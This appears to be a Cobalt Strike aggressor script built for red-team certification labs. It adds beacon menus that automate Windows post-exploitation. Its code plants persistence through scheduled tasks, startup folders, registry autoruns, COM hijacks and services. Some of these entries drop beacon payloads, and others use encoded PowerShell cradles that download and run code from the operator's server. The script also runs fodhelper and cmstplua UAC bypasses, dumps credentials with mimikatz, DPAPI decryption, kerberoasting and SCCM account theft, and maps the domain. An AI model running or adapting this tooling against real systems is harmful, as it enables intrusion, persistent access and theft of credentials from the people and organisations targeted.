    CRTO.cna
     1 +## Helper Functions
     2 +inline print_info {
     3 + println(formatDate("[HH:mm:ss] ") . "\cE[crto.cna]\o " . $1);
     4 +}
     5 + 
     6 +inline print_error {
     7 + println(formatDate("[HH:mm:ss] ") . "\c4[crto.cna]\o " . $1);
     8 +}
     9 + 
     10 + 
     11 +## Global Variables
     12 +global('$ip');
     13 + 
     14 +#$wait = 1;
     15 + 
     16 +$ip = localip();
     17 +
     18 +popup beacon_bottom
     19 +{
     20 + menu "CRTO"
     21 + {
     22 + item "Initialize"
     23 + {
     24 + mkdir(script_resource("Payloads"));
     25 + mkdir(script_resource("Tools"));
     26 + }
     27 + item "Get Flag"
     28 + {
     29 + bshell($1, "type C:\\Users\\administrator\\Desktop\\flag*");
     30 + }
     31 + menu "Host Reconnaissance"
     32 + {
     33 + menu "Seatbelt"
     34 + {
     35 + item "Group : user"
     36 + {
     37 + binput($1, "Seatbelt.exe -group=user");
     38 + bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=user");
     39 + }
     40 +
     41 + item "Group : system"
     42 + {
     43 + binput($1, "Seatbelt.exe -group=system");
     44 + bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=system");
     45 +
     46 + }
     47 +
     48 + item "Group : remote"
     49 + {
     50 + binput($1, "Seatbelt.exe -group=remote");
     51 + bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=remote");
     52 + }
     53 +
     54 + item "Group : misc"
     55 + {
     56 + binput($1, "Seatbelt.exe -group=misc");
     57 + bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), " -group=misc");
     58 + }
     59 + }
     60 + }
     61 + menu "Host Persistence"
     62 + {
     63 + menu "Task Scheduler"
     64 + {
     65 + item "Powershell HTTP x64"
     66 + {
     67 + local('$dialog %defaults $script $PScommandBase64');
     68 +
     69 + foreach $name (listeners_local()) {
     70 + $listener_name = lc($name);
     71 + if ($listener_name hasmatch "http") {
     72 + $script = artifact_payload($name, "powershell", "x64", "process", "None");
     73 + }
     74 + }
     75 + # host the script!
     76 + $url = site_host($ip, 80, "/tsp", $script, "text/plain", "Persistence - Task Scheduler - Powershell");
     77 + # Base64 powershell command + AMSI
     78 + $PScommandBase64 = transform("IEX ((new-object net.webclient).downloadstring(\"$url_amsi\"));IEX ((new-object net.webclient).downloadstring(\"$url\"))","powershell-base64");
     79 + 
     80 + $ToExec ="-t schtask -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc $PScommandBase64\" -n \"Updater\" -m add -o hourly";
     81 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     82 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     83 + }
     84 + item "Exe HTTP x64"
     85 + {
     86 + local('$dialog %defaults $data $PScommandBase64');
     87 +
     88 + foreach $name (listeners_local()) {
     89 + $listener_name = lc($name);
     90 + if ($listener_name hasmatch "http") {
     91 + $data = artifact_payload($name, "exe", "x64", "process", "None");
     92 + }
     93 + }
     94 + $outfile = getFileProper(script_resource("Payloads"), "http_tsp.exe");
     95 + $handle = openf("> $outfile");
     96 + writeb($handle, $data);
     97 + closef($handle);
     98 +
     99 + bcd($1, "c:\\windows\\Temp");
     100 + bupload($1, $outfile);
     101 +
     102 + $ToExec ="-t schtask -c \"C:\\Windows\\Temp\\http_tsp.exe\" -n \"UpdaterBin\" -m add -o hourly";
     103 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     104 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     105 + }
     106 + }
     107 + menu "Startup Folder"
     108 + {
     109 + item "Powershell HTTP x64"
     110 + {
     111 + local('$dialog %defaults $script $PScommandBase64');
     112 +
     113 + foreach $name (listeners_local()) {
     114 + $listener_name = lc($name);
     115 + if ($listener_name hasmatch "http") {
     116 + $script = artifact_payload($name, "powershell", "x64", "process", "None");
     117 + }
     118 + }
     119 + # host the script!
     120 + $url = site_host($ip, 80, "/sfp", $script, "text/plain", "Persistence - Task Scheduler - Powershell");
     121 + # Base64 powershell command + AMSI
     122 + $PScommandBase64 = transform("IEX ((new-object net.webclient).downloadstring(\"$url_amsi\"));IEX ((new-object net.webclient).downloadstring(\"$url\"))","powershell-base64");
     123 + 
     124 + $ToExec ="-t startupfolder -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc $PScommandBase64\" -m add -f \"UserEnvSetup\"";
     125 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     126 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     127 + }
     128 + item "Exe HTTP x64"
     129 + {
     130 + local('$dialog %defaults $data');
     131 +
     132 + foreach $name (listeners_local()) {
     133 + $listener_name = lc($name);
     134 + if ($listener_name hasmatch "http") {
     135 + $data = artifact_payload($name, "exe", "x64", "process", "None");
     136 + }
     137 + }
     138 + $outfile = getFileProper(script_resource("Payloads"), "http_sfp.exe");
     139 + $handle = openf("> $outfile");
     140 + writeb($handle, $data);
     141 + closef($handle);
     142 +
     143 + bcd($1, "c:\\windows\\Temp");
     144 + bupload($1, $outfile);
     145 +
     146 + $ToExec ="-t startupfolder -c \"C:\\Windows\\Temp\\http_sfp.exe\" -m add -f \"UserEnvSetupBin\"";
     147 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     148 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     149 + }
     150 + }
     151 + menu "Registry AutoRun"
     152 + {
     153 + item "Exe HTTP x64"
     154 + {
     155 + local('$dialog %defaults $data');
     156 +
     157 + foreach $name (listeners_local()) {
     158 + $listener_name = lc($name);
     159 + if ($listener_name hasmatch "http") {
     160 + $data = artifact_payload($name, "exe", "x64", "process", "None");
     161 + }
     162 + }
     163 + $outfile = getFileProper(script_resource("Payloads"), "http_arp.exe");
     164 + $handle = openf("> $outfile");
     165 + writeb($handle, $data);
     166 + closef($handle);
     167 +
     168 + bcd($1, "c:\\windows\\Temp");
     169 + bupload($1, $outfile);
     170 +
     171 + $ToExec ="-t reg -c \"C:\\Windows\\Temp\\http_arp.exe\" -k \"hkcurun\" -v UpdaterBin -m add";
     172 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     173 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     174 + }
     175 + }
     176 + menu "COM Hijacks"
     177 + {
     178 + item "Dll HTTP x64"
     179 + {
     180 + local('$dialog %defaults $data');
     181 +
     182 + foreach $name (listeners_local()) {
     183 + $listener_name = lc($name);
     184 + if ($listener_name hasmatch "http") {
     185 + $data = artifact_payload($name, "dll", "x64", "thread", "None");
     186 + }
     187 + }
     188 + $outfile = getFileProper(script_resource("Payloads"), "http_com.dll");
     189 + $handle = openf("> $outfile");
     190 + writeb($handle, $data);
     191 + closef($handle);
     192 +
     193 + bcd($1, "c:\\windows\\Temp");
     194 + bupload($1, $outfile);
     195 +
     196 + $ToExec ="-t reg -c \"C:\\Windows\\Temp\\http_arp.exe\" -a \"/q /n\" -k \"hkcurun\" -v UpdaterBin -m add";
     197 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     198 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     199 + bpowerpick($1,"New-Item -Path \"HKCU:Software\\Classes\\CLSID\" -Name \"{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\"");
     200 + bpowerpick($1,"New-Item -Path \"HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\" -Name \"InprocServer32\" -Value \"c:\\windows\\Temp\\http_com.dll\"");
     201 + bpowerpick($1,"New-ItemProperty -Path \"HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32\" -Name \"ThreadingModel\" -Value \"Both\"");
     202 + }
     203 + }
     204 + menu "Services"
     205 + {
     206 + item "Svc TCP Bind Local x64"
     207 + {
     208 + local('$dialog %defaults $data');
     209 +
     210 + foreach $name (listeners_local()) {
     211 + $listener_name = lc($name);
     212 + if ($listener_name hasmatch "tcp-local") {
     213 + $data = artifact_payload($name, "svcexe", "x64", "process", "None");
     214 + }
     215 + }
     216 + $outfile = getFileProper(script_resource("Payloads"), "tcp_svc.exe");
     217 + $handle = openf("> $outfile");
     218 + writeb($handle, $data);
     219 + closef($handle);
     220 +
     221 + bcd($1, "c:\\windows\\Temp");
     222 + bupload($1, $outfile);
     223 +
     224 + $ToExec ="-t service -c \"C:\\Windows\\Temp\\tcp_svc.exe\" -n \"legit-svc\" -m add";
     225 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     226 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     227 + }
     228 + item "Svc DNS"
     229 + {
     230 + local('$dialog %defaults $data');
     231 +
     232 + foreach $name (listeners_local()) {
     233 + $listener_name = lc($name);
     234 + if ($listener_name hasmatch "dns") {
     235 + $data = artifact_payload($name, "svcexe", "x64", "process", "None");
     236 + }
     237 + }
     238 + $outfile = getFileProper(script_resource("Payloads"), "tcp_svc.exe");
     239 + $handle = openf("> $outfile");
     240 + writeb($handle, $data);
     241 + closef($handle);
     242 +
     243 + bcd($1, "c:\\windows\\Temp");
     244 + bupload($1, $outfile);
     245 +
     246 + $ToExec ="-t service -c \"C:\\Windows\\Temp\\tcp_svc.exe\" -n \"legit-svc\" -m add";
     247 + binput($1, "execute-assembly SharPersist.exe $ToExec");
     248 + bexecute_assembly($1, script_resource('Tools/SharPersist.exe'), $ToExec);
     249 + }
     250 + }
     251 + }
     252 + menu "Privilege Escalation"
     253 + {
     254 + item "Unquoted Service Paths"
     255 + {
     256 + binput($1, "SharpUp.exe audit UnquotedServicePath");
     257 + bexecute_assembly($1, script_resource('Tools/SharpUp.exe'), " audit UnquotedServicePath");
     258 + }
     259 + item "Weak Service Binary Permissions"
     260 + {
     261 + binput($1, "SharpUp.exe audit ModifiableServices");
     262 + bexecute_assembly($1, script_resource('Tools/SharpUp.exe'), " audit ModifiableServices");
     263 + }
     264 + menu "UAC Bypasses"
     265 + {
     266 + item "Elevate Kit Bind TCP Local x64"
     267 + {
     268 + binput($1, "elevate uac-schtasks tcp-local");
     269 +
     270 + foreach $name (listeners_local()) {
     271 + $listener_name = lc($name);
     272 + if ($listener_name hasmatch "tcp-local") {
     273 + belevate($1, "uac-schtasks", $name);
     274 + }
     275 + }
     276 + bconnect($1, "127.0.0.1",4444);
     277 + }
     278 + item "Fodhelper Bind TCP Local x64"
     279 + {
     280 + binput($1, "Fodhelper Priv Esc");
     281 + local('$dialog %defaults $data');
     282 +
     283 + foreach $name (listeners_local()) {
     284 + $listener_name = lc($name);
     285 + if ($listener_name hasmatch "tcp-local") {
     286 + $data = artifact_payload($name, "exe", "x64", "process", "None");
     287 + }
     288 + }
     289 + $outfile = getFileProper(script_resource("Payloads"), "tcp_fhuac.exe");
     290 + $handle = openf("> $outfile");
     291 + writeb($handle, $data);
     292 + closef($handle);
     293 +
     294 + bcd($1, "c:\\windows\\Temp");
     295 + bupload($1, $outfile);
     296 + 
     297 + bpowerpick($1,"New-Item \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Force");
     298 + bpowerpick($1,"New-ItemProperty -Path \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force");
     299 + bpowerpick($1,"Set-ItemProperty -Path \"HKCU:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\" -Name \"(default)\" -Value \"c:\\windows\\Temp\\tcp_fhuac.exe\" -Force");
     300 + brun($1,"cmd.exe /C \"C:\\Windows\\System32\\fodhelper.exe\"");
     301 + bconnect($1, "127.0.0.1",4444);
     302 + }
     303 + item "runasadmin uac-cmstplua HTTP x64 (from Powershell)"
     304 + {
     305 + local('$dialog %defaults $script $PScommandBase64');
     306 +
     307 + foreach $name (listeners_local()) {
     308 + $listener_name = lc($name);
     309 + if ($listener_name hasmatch "http") {
     310 + $data = artifact_payload($name, "exe", "x64", "process", "None");
     311 + }
     312 + }
     313 + $outfile = getFileProper(script_resource("Payloads"), "uac.exe");
     314 + $handle = openf("> $outfile");
     315 + writeb($handle, $data);
     316 + closef($handle);
     317 +
     318 + bcd($1, "c:\\windows\\Tasks");
     319 + bupload($1, $outfile);
     320 +
     321 + binput($1, "runasadmin uac-cmstplua C:\\Windows\\Tasks\\uac.exe");
     322 + belevate_command($1, "uac-cmstplua", "C:\\Windows\\Tasks\\uac.exe");
     323 + }
     324 + }
     325 + }
     326 + menu "Credentials"
     327 + {
     328 + item "Lsa secret"
     329 + {
     330 + bmimikatz($1, "token::elevate; lsadump::secrets");
     331 + }
     332 +
     333 + item "logonpassword"
     334 + {
     335 + bmimikatz($1, "token::elevate; sekurlsa::logonpasswords");
     336 + }
     337 + 
     338 + item "SAM dump"
     339 + {
     340 + bmimikatz($1, "token::elevate; lsadump::sam");
     341 + }
     342 + 
     343 + item "Kerberos Encryption Keys"
     344 + {
     345 + bmimikatz($1, "token::elevate; sekurlsa::ekeys");
     346 + }
     347 + 
     348 + item "Domain Cached Credentials"
     349 + {
     350 + bmimikatz($1, "token::elevate; lsadump::cache");
     351 + }
     352 +
     353 + item "Kerberos Tickets list"
     354 + {
     355 + bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "triage");
     356 + }
     357 + 
     358 + item "Wifi password"
     359 + {
     360 + bexecute_assembly($1, script_resource('Tools/SharpWifiDump.exe'), " ");
     361 + }
     362 + 
     363 + item "Password in registry (Machine)"
     364 + {
     365 + bpowerpick($1, "reg query HKLM /f password /t REG_SZ /s");
     366 + }
     367 + 
     368 + item "Password in registry (User)"
     369 + {
     370 + bpowerpick($1, "reg query HKLM /f password /t REG_SZ /s");
     371 + }
     372 + 
     373 + item "SharpWeb"
     374 + {
     375 + bexecute_assembly($1, script_resource('Tools/SharpWeb.exe'), " all");
     376 + }
     377 + }
     378 + menu "Domain Reconnaissance"
     379 + {
     380 + item "Domain information"
     381 + {
     382 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     383 + bpowerpick($1, ' Get-Domain');
     384 + bpowershell_import_clear($1);
     385 + }
     386 +
     387 + item "Domain Controller"
     388 + {
     389 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     390 + bpowerpick($1, ' Get-DomainController');
     391 + bpowershell_import_clear($1);
     392 + }
     393 +
     394 + item "Trust information"
     395 + {
     396 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     397 + bpowerpick($1, ' Get-DomainTrust');
     398 + bpowershell_import_clear($1);
     399 +
     400 + }
     401 +
     402 + item "User list"
     403 + {
     404 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     405 + bpowerpick($1, ' Get-DomainUser -Properties DisplayName, MemberOf | fl');
     406 + bpowershell_import_clear($1);
     407 + }
     408 +
     409 + item "Computer list"
     410 + {
     411 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     412 + bpowerpick($1, ' Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName');
     413 + bpowershell_import_clear($1);
     414 + }
     415 +
     416 +
     417 + item "Group list"
     418 + {
     419 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     420 + bpowerpick($1, ' Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName');
     421 + bpowershell_import_clear($1);
     422 + }
     423 +
     424 + item "GPO list"
     425 + {
     426 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     427 + bpowerpick($1, ' Get-DomainGPO -Properties DisplayName | sort -Property DisplayName');
     428 + bpowershell_import_clear($1);
     429 + }
     430 +
     431 + item "GPO Local Group"
     432 + {
     433 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     434 + bpowerpick($1, ' Get-DomainGPOLocalGroup | select GPODisplayName, GroupName');
     435 + bpowershell_import_clear($1);
     436 + }
     437 +
     438 + item "GPO with modification rights"
     439 + {
     440 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     441 + bpowerpick($1, ' $sid=Get-DomainSID ; Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match $sid+"-[\d]{4,10}" }');
     442 + bpowershell_import_clear($1);
     443 + }
     444 +
     445 + item "OU list"
     446 + {
     447 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     448 + bpowerpick($1, ' Get-DomainOU -Properties Name | sort -Property Name');
     449 + bpowershell_import_clear($1);
     450 + }
     451 +
     452 +
     453 + item "MSSQL Local Instance"
     454 + {
     455 + bpowershell_import($1, script_resource("Tools/PowerUpSQL.ps1"));
     456 + bpowerpick($1, ' Get-SQLInstanceLocal -Verbose');
     457 + bpowershell_import_clear($1);
     458 +
     459 + }
     460 +
     461 +
     462 + item "MSSQL Domain Instance"
     463 + {
     464 + bpowershell_import($1, script_resource("Tools/PowerUpSQL.ps1"));
     465 + bpowerpick($1, ' Get-SQLInstanceDomain -Verbose');
     466 + bpowershell_import_clear($1);
     467 +
     468 + }
     469 +
     470 + item "Kerberoastable user"
     471 + {
     472 + bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "kerberoast /nowrap");
     473 + }
     474 +
     475 + item "Asreprostable user"
     476 + {
     477 + bexecute_assembly($1, script_resource('Tools/Rubeus.exe'), "asreproast /nowrap");
     478 + }
     479 +
     480 + item "Logged on"
     481 + {
     482 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     483 + bpowerpick($1, ' Get-DomainComputer | Get-NetLoggedon');
     484 + bpowershell_import_clear($1);
     485 + }
     486 +
     487 + item "Net session"
     488 + {
     489 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     490 + bpowerpick($1, ' Get-DomainComputer | Get-NetSession');
     491 + bpowershell_import_clear($1);
     492 + }
     493 +
     494 + item "RDP Session"
     495 + {
     496 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     497 + bpowerpick($1, ' Get-DomainComputer | Get-NetRDPSession');
     498 + bpowershell_import_clear($1);
     499 + }
     500 +
     501 + item "DFS Share"
     502 + {
     503 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     504 + bpowerpick($1, ' Get-DomainDFSShare');
     505 + bpowershell_import_clear($1);
     506 +
     507 + }
     508 +
     509 + item "Net share"
     510 + {
     511 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     512 + bpowerpick($1, ' Get-DomainComputer | Get-NetShare');
     513 + bpowershell_import_clear($1);
     514 + }
     515 +
     516 + item "Share finder"
     517 + {
     518 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     519 + bpowerpick($1, 'Find-DomainShare -CheckShareAccess');
     520 + bpowershell_import_clear($1);
     521 + }
     522 +
     523 + item "Search *.doc*, *.xls*, *.csv, *.ppt* in shares"
     524 + {
     525 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     526 + bpowerpick($1, 'Find-InterestingDomainShareFile -Include *.doc*, *.xls*, *.csv, *.ppt*');
     527 + bpowershell_import_clear($1);
     528 + }
     529 +
     530 + item "Search Unconstrained deleguation"
     531 + {
     532 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     533 + bpowerpick($1, ' Get-DomainComputer -UnConstrained | select samaccountname, dnshostname');
     534 + bpowershell_import_clear($1);
     535 + }
     536 +
     537 + item "Search deleguation (user)"
     538 + {
     539 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     540 + bpowerpick($1, ' Get-DomainUser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto');
     541 + bpowershell_import_clear($1);
     542 + }
     543 +
     544 + item "Search deleguation (computer)"
     545 + {
     546 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     547 + bpowerpick($1, ' Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto');
     548 + bpowershell_import_clear($1);
     549 + }
     550 +
     551 + item "DNS Record"
     552 + {
     553 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     554 + bpowerpick($1, ' Get-DomainDNSZone | Get-DomainDNSRecord | select name');
     555 + bpowershell_import_clear($1);
     556 + }
     557 +
     558 + item "Run SharpHound"
     559 + {
     560 + bexecute_assembly($1, script_resource('Tools/SharpHound.exe'), "-c All,GPOLocalGroup");
     561 + }
     562 + }
     563 + menu "DPAPI"
     564 + {
     565 + item "Credential Manager"
     566 + {
     567 + binput($1, "Seatbelt.exe WindowsCredentialFiles");
     568 + bexecute_assembly($1, script_resource('Tools/Seatbelt.exe'), "WindowsCredentialFiles");
     569 + }
     570 + item "Get Master Key cached (admin)"
     571 + {
     572 + binput($1, "mimikatz !sekurlsa::dpapi");
     573 + bmimikatz($1, "!sekurlsa::dpapi");
     574 + }
     575 + item "List Master keys files"
     576 + {
     577 + bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Protect/S-*/*-*-*-*-*,\$env:localappdata/Microsoft/Protect/S-*/*-*-*-*-*", '', '', &result_ps);
     578 + }
     579 + item "List Credentials files"
     580 + {
     581 + bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Credentials,\$env:localappdata/Microsoft/Credentials", '', '', &result_ps);
     582 + }
     583 + item "Decrypt current user Credentials"
     584 + {
     585 + bpowerpick($1, "gci -hidden \$env:appdata/Microsoft/Credentials,\$env:localappdata/Microsoft/Credentials \| foreach \{\$_.FullName\}", '', '', &result_get_creds);
     586 + }
     587 + item "Decrypt Scheduled Task Credentials (admin)"
     588 + {
     589 + bpowerpick($1, "gci -hidden C:/Windows/System32/config/systemprofile/AppData/Local/Microsoft/Credentials \| foreach \{\$_.FullName\}", '', '', &result_get_task_creds);
     590 + }
     591 + }
     592 + menu "ADCS"
     593 + {
     594 + item "Finding Certificate Authorities"
     595 + {
     596 + binput($1, "Certify.exe cas");
     597 + bexecute_assembly($1, script_resource('Tools/Certify.exe'), "cas");
     598 + }
     599 + item "Misconfigured Certificate Templates"
     600 + {
     601 + binput($1, "Certify.exe find /vulnerable");
     602 + bexecute_assembly($1, script_resource('Tools/Certify.exe'), "find /vulnerable");
     603 + }
     604 + }
     605 + menu "Microsoft Configuration Manager"
     606 + {
     607 + item "Finding SCCM Servers (SharpSCCM)"
     608 + {
     609 + binput($1, "SharpSCCM.exe local site-info --no-banner");
     610 + bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "local site-info --no-banner");
     611 + }
     612 + item "Finding SCCM Servers (WMI)"
     613 + {
     614 + binput($1, "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM | select Name, CurrentManagementPoint | fl");
     615 + bpowerpick($1, "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM | select Name, CurrentManagementPoint | fl");
     616 + }
     617 + item "NAC Credentials (admin)"
     618 + {
     619 + binput($1, "SharpSCCM.exe local naa -m wmi --no-banner");
     620 + bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "local naa -m wmi --no-banner");
     621 + }
     622 + item "Get SCCM Collections for current user"
     623 + {
     624 + binput($1, "SharpSCCM.exe get collections --no-banner");
     625 + bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "get collections --no-banner");
     626 + }
     627 + item "Get SCCM User rights"
     628 + {
     629 + binput($1, "SharpSCCM.exe get class-instances SMS_Admin --no-banner");
     630 + bexecute_assembly($1, script_resource('Tools/SharpSCCM.exe'), "get class-instances SMS_Admin --no-banner");
     631 + }
     632 + }
     633 + menu "LAPS"
     634 + {
     635 + item "Check if AdmPwd.dll exists in local computer"
     636 + {
     637 + binput($1, "ls C:\\Program Files\\LAPS\\CSE");
     638 + bls($1, "C:\\Program Files\\LAPS\\CSE");
     639 + }
     640 + item "Search GPO with LAPS in name"
     641 + {
     642 + binput($1, "Get-DomainGPO | ? { \$_.DisplayName -like \"*laps*\" } | select DisplayName, Name, GPCFileSysPath | fl");
     643 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     644 + bpowerpick($1, "Get-DomainGPO | ? { \$_.DisplayName -like \"*laps*\" } | select DisplayName, Name, GPCFileSysPath | fl");
     645 + bpowershell_import_clear($1);
     646 + }
     647 + item "List computer with ms-Mcs-AdmPwdExpirationTime not null"
     648 + {
     649 + binput($1, "Get-DomainComputer | ? { \$_.\"ms-Mcs-AdmPwdExpirationTime\" -ne \$null } | select dnsHostName");
     650 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     651 + bpowerpick($1, "Get-DomainComputer | ? { \$_.\"ms-Mcs-AdmPwdExpirationTime\" -ne \$null } | select dnsHostName");
     652 + bpowershell_import_clear($1);
     653 + }
     654 + item "List who is allowed to read LAPS password (PowerView)"
     655 + {
     656 + binput($1, "Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { \$_.ObjectAceType -eq \"ms-Mcs-AdmPwd\" -and \$_.ActiveDirectoryRights -match \"ReadProperty\" } | select ObjectDn, SecurityIdentifier | fl");
     657 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     658 + bpowerpick($1, "Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { \$_.ObjectAceType -eq \"ms-Mcs-AdmPwd\" -and \$_.ActiveDirectoryRights -match \"ReadProperty\" } | select ObjectDn, SecurityIdentifier | fl");
     659 + bpowershell_import_clear($1);
     660 + }
     661 + item "List who is allowed to read LAPS password (LAPSToolkit)"
     662 + {
     663 + binput($1, "Find-LAPSDelegatedGroups");
     664 + bpowershell_import($1, script_resource("Tools/LAPSToolkit.ps1"));
     665 + bpowerpick($1, 'Find-LAPSDelegatedGroups');
     666 + bpowershell_import_clear($1);
     667 + }
     668 + }
     669 + menu "AppLocker"
     670 + {
     671 + item "Search GPO with AppLocker in name"
     672 + {
     673 + binput($1, "Get-DomainGPO -Domain dev-studio.com | ? { \$_.DisplayName -like \"*AppLocker*\" } | select displayname, gpcfilesyspath");
     674 + bpowershell_import($1, script_resource("Tools/PowerView.ps1"));
     675 + bpowerpick($1, "Get-DomainGPO -Domain dev-studio.com | ? { \$_.DisplayName -like \"*AppLocker*\" } | select displayname, gpcfilesyspath");
     676 + bpowershell_import_clear($1);
     677 + }
     678 + }
     679 + }
     680 +}
     681 + 
     682 +## Generate Payload
     683 +sub generate_my_payload {
     684 + $outfile = getFileProper(script_resource("Payloads"), $2);
     685 + $handle = openf("> $outfile");
     686 + writeb($handle, $1);
     687 + closef($handle);
     688 +}
     689 + 
     690 +## DPAPI functions
     691 +## SYSTEM
     692 +sub result_get_task_creds {
     693 + local('$cmd $cred $out')
     694 + binput($1, 'Powerpick executed');
     695 + foreach $cred (split('\r\n', $2))
     696 + {
     697 + $cmd = "!sekurlsa::dpapi;dpapi::cred /in:" . $cred;
     698 + bmimikatz($1, $cmd, $null, $null,&write_in_file_task_dpapi);
     699 + }
     700 +}
     701 + 
     702 +sub write_in_file_task_dpapi {
     703 + binput($1, "Full Credentials wrote in c:/windows/temp/dpapi_task.txt");
     704 + $out = openf(">>" . "c:/windows/temp/dpapi_task.txt");
     705 + writeb($out, $2);
     706 + closef($out);
     707 +}
     708 + 
     709 +## User
     710 +sub result_get_creds {
     711 + local('$cmd $cred $out')
     712 + binput($1, 'Powerpick executed');
     713 + foreach $cred (split('\r\n', $2))
     714 + {
     715 + $cmd = "dpapi::cred /in:" . $cred;
     716 + bmimikatz($1, $cmd, $null, $null, lambda({ result_get_masterkey ($1, $2, $3, $cred); }, \$cred));
     717 + }
     718 +}
     719 + 
     720 +sub result_get_masterkey {
     721 + local('$mk $cred');
     722 + binput($1, "Mimikatz Executed");
     723 + $cred = $4;
     724 + $mk = matches($2, 'guidMasterKey[^\{]+\{([^\}]+)\}')[0];
     725 + bpowerpick($1, "gci -hidden -ErrorAction \"silentlycontinue\" \$env:appdata/Microsoft/Protect/S-*/*-*-*-*-*,\$env:localappdata/Microsoft/Protect/S-*/*-*-*-*-* \| foreach \{\$_.FullName\} \| findstr " . $mk, '', '', lambda({ result_get_mk ($1, $2, $3, $cred); }, \$cred));
     726 +}
     727 + 
     728 +sub result_get_mk {
     729 + local('$mk $cred');
     730 + $mk = split('\r\n', $2)[0];
     731 + $cred = $4;
     732 + bmimikatz($1, "dpapi::masterkey /in:" . $mk . " /rpc;dpapi::cred /in:" . $cred, $null, $null, &write_in_file_dpapi);
     733 +}
     734 + 
     735 +sub write_in_file_dpapi {
     736 + binput($1, "Full Credentials wrote in c:/windows/temp/dpapi.txt");
     737 + $out = openf(">>" . "c:/windows/temp/dpapi.txt");
     738 + writeb($out, $2);
     739 + closef($out);
     740 +}
     741 + 
     742 +# Handle DNS beacon
     743 +on beacon_initial_empty {
     744 + binput($1, "[Acting on new DNS Beacon]");
     745 +
     746 + # change the data channel to DNS TXT
     747 + bmode($1, "dns-txt");
     748 +
     749 + # request the Beacon checkin and send its metadata
     750 + bcheckin($1);
     751 +}
     752 + 
     753 +print_info("CRTO CNA loaded");
     754 + 
